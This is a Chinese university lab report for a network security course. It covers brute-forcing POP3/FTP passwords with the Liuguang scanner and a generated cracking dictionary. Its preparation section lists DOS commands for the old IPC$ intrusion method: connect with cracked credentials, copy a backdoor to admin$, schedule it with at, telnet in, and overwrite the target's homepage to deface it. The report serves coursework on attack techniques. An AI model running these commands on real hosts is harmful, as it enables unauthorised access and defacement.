基于认证的攻击的实验报告

课程名称： 网络安全技术 项目名称： 基于认证的攻击

姓名： 专业：通信工程 班级：1班 学号： 同组成员 无 一、 实验准备1： 1、 实验环境 PC机1台 流光（v5.0）软件 Windonws操作系统 2、实验预备知识 流光（v5.0）：一个绝好的ftp、pop3解密工具，界面豪华，功能强大！功能简介如下：1、用于检测POP3/FTP主机中用户密码安全漏洞。2、163/169双通。3、多线程检测，消除系统中密码漏洞。4、高效的用户流模式。5、高效服务器流模式，可同时对多台POP3/FTP主机进行检测。6、最多500个线程探测。7、线程超时设置，阻塞线程具有自杀功能，不会影响其他线程。8、支持10个字典同时检测。9、检测设置可作为项目保存。10、取消了国内IP限制而且免费。 Dos命令行下的命令及功能： 1、 net use \\\\对方ip\\ipc$ \"密码\" /user:\"用户名\" || 建立远程连接 2、 copy icmd.exe \\\\对方ip\\admin$ || admin$是对方的winnt目录 ：） 这里文件多。 3、 net time \\\\对方IP || 看看对方的本地时间 4、at \\\\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代 3/4两步。 5、 telnet 对方ip 端口 || 6、输入pass （如果不是用icmd.exe，或者没有设置口令就不用了） || 7、在开个窗口，继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe 如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止，一般是在X:\\interpub\\wwwroot\\ . 假如首页文件是default.htm并且在c:\\interpub\\wwwroot，这样:copy default.htm \\\\ip\\c$\\interpub\\wwwroot 1

注：1、实验准备部分包括实验环境准备和实验所需知识点准备。

2、若是单人单组实验，同组成员填无。

二、实验过程记录2： (一)、实验目的 1.掌握黑客字典的设置，熟悉扫描器流光的设置与使用。 2.利用获取的账号和口令进行远程控制。 (二)、实验步骤 1 、 运行流光（V5.0）软件如图1 图1 2、“工具”--\"字典工具\"--“黑客字典工具III”，如图2；选择文件存放位置--浏览--选择路径和重命名文件，如图3；查看字典属性，生成字典，如图4，图5： 2

注：实验过程记录要包含实验目的、实验原理、实验步骤，页码不够可自行添加。

图2 图3 图4 图5 3、设置目标主机IP进行扫描，以及设置各选项，点击下一步。如图6-20 图6 图7 图8 图8 图9 图10 图11 图12 图13 图14 图15 图16 图16 图17 图18 图19 图20 4、选择主机，进行扫描，查看扫描结果。如图21-25 图21 图22 图23 图24 图25 三、实验小结：3 通过本次实验简单了解了流光（V5.0）软件的功能，并通过该软件扫描远端计算机的端口，利用黑客字典进行暴力破解。通过本次实验掌握了流光（V5.0）的简单扫描功能，以及进行简单的设置。实验中存在较多的问题，通过与同学的交流较好的解决了问题，本次实验有较大的收获。 实验报告成绩（百分制）__________ 实验指导教师签字：__________

3

注：1、实验小结应包含实验所需知识点和实验方法的总结，实验心得体会等。

2、分组实验需包含同组讨论内容。